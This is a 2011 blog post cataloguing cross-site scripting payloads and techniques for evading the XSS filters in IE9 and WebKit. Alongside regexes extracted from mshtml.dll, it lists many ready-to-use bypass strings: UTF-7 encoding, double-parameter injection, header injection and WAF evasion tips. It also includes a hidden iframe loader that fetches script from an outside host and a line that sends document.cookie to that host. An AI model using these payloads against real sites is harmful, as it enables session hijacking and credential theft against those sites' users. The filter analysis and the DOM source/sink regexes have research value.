Anti-Phishing Research, Tombstones

Thursday, September 22, 2011

MSHTML.DLL, IE XSS Filter, WebKit XSS Filter, Evasion, Resource, Proof of Concept, Example, DOM, DORK, Cross Site Scripting, Links, Credits

Bypass XSS Neutering in User-Agents
Cumulative URL for Evasion Techniques
This Post to be updated frequently - Last updated 10/7/2011 @1200GMT

Abstract: Modern User-Agents are exploited by well-crafted URL's that execute outside the defense coverage envelope of XSS Neutering routines.

Definition of XSS (Ferruh Mavituna): Cross-site Scripting (CWE-79, CAPEC-86) allows an attacker to execute a dynamic script (Javascript, VbScript) in the context of the application. XSS allows for hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/Javascript/VbScript by the browser.

XSS Filter Coverage Envelopes in Modern User Agents

XSS Filters from MSHTML.DLL used in IE9 (Q3/2011)
======================================================
findstr /C:"sc{r}" \WINDOWS\SYSTEM32\mshtml.dll|find "{"
======================================================
MSHTML.DLL Summary - 23 Hardcoded Regex in mshtml.dll
======================================================
Fixed strings (2) javascript:, vbscript:
HTML tags (14) object, applet, base, link, meta, import, embed, vmlframe, iframe, script(2), style, isindex, form
HTML attributes (3)  " datasrc, " style=, " on*= (event handlers)
JavaScript strings (4) ";location=, ";a.b=, ");a(, ";a(b)
======================================================
IE XSS REGEX RESULTS (Q3/2011)
======================================================
{(v|(&[#()\[\].]x?0*((86)|(56)|(118)|(76));?))([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*(b|(&[#()\[\].]x?0*((66)|(42)|(98)|(62));?))([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*(s|(&[#()\[\].]x?0*((83)|(53)|(115)|(73));?))([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*(c|(&[#()\[\].]x?0*((67)|(43)|(99)|(63));?))([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*{(r|(&[#()\[\].]x?0*((82)|(52)|(114)|(72));?))}([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*(i|(&[#()\[\].]x?0*((73)|(49)|(105)|(69));?))([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*(p|(&[#()\[\].]x?0*((80)|(50)|(112)|(70));?))([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*(t|(&[#()\[\].]x?0*((84)|(54)|(116)|(74));?))([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*(:|(&[#()\[\].]x?0*((58)|(3A));?)).}
{(j|(&[#()\[\].]x?0*((74)|(4A)|(106)|(6A));?))([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*(a|(&[#()\[\].]x?0*((65)|(41)|(97)|(61));?))([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*(v|(&[#()\[\].]x?0*((86)|(56)|(118)|(76));?))([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*(a|(&[#()\[\].]x?0*((65)|(41)|(97)|(61));?))([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*(s|(&[#()\[\].]x?0*((83)|(53)|(115)|(73));?))([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*(c|(&[#()\[\].]x?0*((67)|(43)|(99)|(63));?))([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*{(r|(&[#()\[\].]x?0*((82)|(52)|(114)|(72));?))}([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*(i|(&[#()\[\].]x?0*((73)|(49)|(105)|(69));?))([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*(p|(&[#()\[\].]x?0*((80)|(50)|(112)|(70));?))([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*(t|(&[#()\[\].]x?0*((84)|(54)|(116)|(74));?))([\t]|(&[#()\[\].]x?0*(9|(13)|(10)|A|D);?))*(:|(&[#()\[\].]x?0*((58)|(3A));?)).}
{<st{y}le.*?>.*?((@[i\\])|(([:=]|(&[#()\[\].]x?0*((58)|(3A)|(61)|(3D));?)).*?([(\\]|(&[#()\[\].]x?0*((40)|(28)|(92)|(5C));?))))}
{[ /+\t\"\'`]st{y}le[ /+\t]*?=.*?([:=]|(&[#()\[\].]x?0*((58)|(3A)|(61)|(3D));?)).*?([(\\]|(&[#()\[\].]x?0*((40)|(28)|(92)|(5C));?))}
{<OB{J}ECT[ /+\t].*?((type)|(codetype)|(classid)|(code)|(data))[ /+\t]*=}
{<AP{P}LET[ /+\t].*?code[ /+\t]*=}
{[ /+\t\"\'`]data{s}rc[ +\t]*?=.}
{<BA{S}E[ /+\t].*?href[ /+\t]*=}
{<LI{N}K[ /+\t].*?href[ /+\t]*=}
{<ME{T}A[ /+\t].*?http-equiv[ /+\t]*=}
{<\?im{p}ort[ /+\t].*?implementation[ /+\t]*=}
{<EM{B}ED[ /+\t].*?((src)|(type)).*?=}
{[ /+\t\"\'`]{o}n\c\c\c+?[ +\t]*?=.}
{<.*[:]vmlf{r}ame.*?[ /+\t]*?src[ /+\t]*=}
{<[i]?f{r}ame.*?[ /+\t]*?src[ /+\t]*=}
{<is{i}ndex[ /+\t>]}
{<fo{r}m.*?>}
{<sc{r}ipt.*?[ /+\t]*?src[ /+\t]*=}
{<sc{r}ipt.*?>}
{[\"\'][ ]*(([^a-z0-9~_:\'\" ])|(in)).*?(((l|(\\u006C))(o|(\\u006F))({c}|(\\u00{6}3))(a|(\\u0061))(t|(\\u0074))(i|(\\u0069))(o|(\\u006F))(n|(\\u006E)))|((n|(\\u006E))(a|(\\u0061))({m}|(\\u00{6}D))(e|(\\u0065)))).*?=}
{[\"\'][ ]*(([^a-z0-9~_:\'\" ])|(in)).+?{[\[]}.*?{[\]]}.*?=}
{[\"\'][ ]*(([^a-z0-9~_:\'\" ])|(in)).+?{[.]}.+?=}
{[\"\'].*?{\)}[ ]*(([^a-z0-9~_:\'\" ])|(in)).+?{\(}}
{[\"\'][ ]*(([^a-z0-9~_:\'\" ])|(in)).+?{\(}.*?{\)}}
"'{:,
======================================================
XSS Filter Evasion URL Overview - IE9 XSS Filter Neutering Example - Craft a URL
======================================================
HTTP GET http://victim.fqdn/?xss=<script>
======================================================
IE9 performs Regex Match the HTTP Request
======================================================
{sc{r}ipt.*?>}
======================================================
HTTP Response with Script Tags
======================================================
<script>
======================================================
IE9 will Neuter the Output
======================================================
<sc#ipt>
======================================================
IE9 Blocks JS by neutering:
=
(
)
============================================
UTF-7 IE9 Bypass = +ADw-script+AD4-alert(document.location)+ADw-/script+AD4-
============================================
Bypass Expression in IE9 DOM PoC = {valueOf:location,toString:[].join,0:name,length:1}
============================================
Double Parameter Injection XSS Filter Bypass
============================================
?param1=<script>prompt(9);/*&param2=*/</script>
============================================
IE9 Filters to Neuter =
============================================
[\"\'][ ]*(([^a-z0-9~_:\'\" ])|(in)).*?(((l|(\\u006C))(o|(\\u006F))(c|(\\u0063))(a|(\\u0061))(t|(\\u0074))(i|(\\u0069))(o|(\\u006F))(n|(\\u006E)))|((n|(\\u006E))(a|(\\u0061))(m|(\\u006D))(e|(\\u0065)))).*?{=}
[\"\'][ ]*(([^a-z0-9~_:\'\" ])|(in)).+?(([.].+?)|([\[].*?[\]].*?)){=}
=============================================================
IE9 Filter Bypass PoC #1
=============================================================
Regex = [\"\'][ ]*(([^a-z0-9~_:\'\" ])|(in)).*?(location).*?=
Bypass Expression = "+{valueOf:location, toString: [].join,0:'jav\x61script:alert\x280)',length:1}//
location("http://xss.cx/");
=============================================================
IE9 Filter Bypass PoC #2
=============================================================
Regex = {[\\\"\\'][ ]*(([^a-z~_:\\'\\\" 0-9])|(in)).+?{\\(}.*?{\\)}}
Bypass Expression = foo='&js_xss=";alert(0)//
Bypass Expression = ",alert(0)//
Bypass Expression = foo=<a&xss=<x:vmlframe src=payload>
=============================================================
IE9 Filter Bypass PoC #3
=============================================================
Regex = [\"\'][ ]*(([^a-z0-9~_:\'\" ])|(in)).+?(({[.]}.+?)|({[\[]}.*?{[\]]}.*?))=
Bypass Expression = ";x:[document.URL='jav\x61script:alert\x280)']//
Bypass Expression = <a href=“?xss=<script>”>link</a>
=============================================================
WebKit XSSAdmin Filter Bypass #1
=============================================================
"><script>alert(document.location)</script>
"-prompt(document.location)-"
=============================================================
Expect and Referer Header XSS Filter Bypass #1
=============================================================
Expect: <script>alert("DOH")</script>
Referer: http://www.google.com/search?hl=en&q=xss"><script>prompt(9)</script>
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)xss"><script>prompt(9)</script>
=============================================================
Webkit XSS Bypass #2 Example
=============================================================
POST loginName=xss&password=xzz"><script>prompt(document.cookie)</script>cx
=============================================================

=============================================================
XSS.CX IE9 XSS Filter Bypass PoC from Q2/2011
=============================================================
A well-crafted URL with 2 parameters controller by an Attacker.

=============================================================
XSS.CX IE9 Filter Evasion in HotMail - Feb 2011
=============================================================
XSS in profile.live.com, XSS, HOTMAIL, DORK, GHDB, Cross Site Scripting, CWE-79, CAPEC-86=============================================================
XSS.CX Low Hanging Fruit Examples, PoC, XSS, Expression, DOM, DORK
=============================================================
Array = (function(orig){
var f = function() {
alert('DOH');
return orig.apply(this, arguments);
}
f.prototype = orig.prototype;
return f;
})(Array);
------------------------------------------------
eval(unescape(location.href))
------------------------------------------------
onreadystatechange=eval(unescape(location.href))
------------------------------------------------
?name=xss#<script>while(true){alert('XSS');}</script>
------------------------------------------------
document.write("XSS");
------------------------------------------------
#%0Afunction%20DOH%28%29{alert%28%27DOH%27%29%3B}
DOH();
=============================================================
Example FrameBuster JS - From bankofamerica.com
=============================================================
if (self == top) {
var theBody = document.getElementsByTagName('body')[0];
theBody.style.display = "block";
} else {
top.location = self.location;
}
=============================================================
Example FrameBuster JS - From paypal
=============================================================
if (parent.frames.length > 0) {
top.location.replace(document.location);
}
=============================================================
XSS Exploit PoC - iFramer
=============================================================
if (document.getElementsByTagName('body')[0]) {
    iframer();
} else {
    document.write("<iframe src='http://xss.cx/xss.js' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
}
function iframer() {
    var f = document.createElement('iframe');
    f.setAttribute('src', 'http://xss.cx/xss.js');
    f.style.visibility = 'hidden';
    f.style.position = 'absolute';
    f.style.left = '0';
    f.style.top = '0';
    f.setAttribute('width', '10');
    f.setAttribute('height', '10');
    document.getElementsByTagName('body')[0].appendChild(f);
=============================================================
WAF Evasion 101, 102, 103, 104, 105, 106.....
=============================================================
Don't use alert(1), try:
prompt(9)
prompt(0x0064)
prompt(location.hash)
alert(location.hostname)
window.location.assign("http://xss.cx")
document.write(unescape(window.location))
document.location="http://xss.cx/default.aspx?c=" + document.cookie
=============================================================
WebKit Source Tree webkit/LayoutTests/http/tests/security/XSSAuditor/
=============================================================
Some Examples (These are from the URL's listed below)
=============================================================
http://somesite/test.asp?param=<a href="test.asp?param=<sc%0aript>alert('owned')</script>"><div style="position: absolute; left: 0px; top: 0px; height: 1000px; width: 1000px; padding: 1em;background:black;text-align: center;">click to continue</div></a>
"+eval(name)+"
");eval(name+"
";location=name;//
";a.b=c;//
";a[b]=c;//
"+document.cookie+"
- Conducting variable assignments to sensitive data, e.g.
";user_input=document.cookie;//
or
";user_input=sensitive_app_specific_var;//
- Make function assignments, e.g. (Note though that you can't seem to assign to some functions e.g. alert=eval doesn't seem to work)
";escape=eval;//
=============================================================
Suggested Reading
=============================================================
http://blogs.technet.com/b/srd/archive/2008/08/19/ie-8-xss-filter-architecture-implementation.aspx
http://p42.us/ie8xss/Abusing_IE8s_XSS_Filters.pdf
http://www.collinjackson.com/research/xssauditor.pdf
https://www.owasp.org/index.php/DOM_Based_XSS
https://code.google.com/p/domxsswiki/wiki/Index
http://www.webappsec.org/projects/articles/071105.shtml
http://code.google.com/p/urlparsing/
http://kotowicz.net/absolute/
=============================================================
DOM-based XSS - Sources and Sinks - (Mario Heiderich)
=============================================================
Find Sources:
/(location\s*[\[.])|([.\[]\s*["']?\s*(arguments|dialogArguments|innerHTML|write(ln)?|open(Dialog)?|showModalDialog|cookie|URL|documentURI|baseURI|referrer|name|opener|parent|top|content|self|frames)\W)|(localStorage|sessionStorage|Database)/
=============================================================
Find Sinks:
/((src|href|data|location|code|value|action)\s*["'\]]*\s*\+?\s*=)|((replace|assign|navigate|getResponseHeader|open(Dialog)?|showModalDialog|eval|evaluate|execCommand|execScript|setTimeout|setInterval)\s*["'\]]*\s*\()/
============================================================
Credits
============================================================
Kusa55, #thornmaker, DRoss, Colin Jackson, Stefano Di Paola, Mario Heiderich, Gareth Heyes, Sirdarkcat, Kotowicz, RSnake, Giorgio Maone, sqlhacker, Ferruh Mavituna,  Mark Flores Martin, many others...
=============================================================
Keywords: XSS, Reflected Cross Site Scripting, DOM-based XSS, CWE-79, CAPEC-86, DORK, GHDB, BHDB, REGEXP, XSSAdmin, XSS Filter, WebKit, Internet Explorer
Posted by Hoyt LLC at Thursday, September 22, 2011
Labels: , , , , , , , , ,
Reactions: 

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)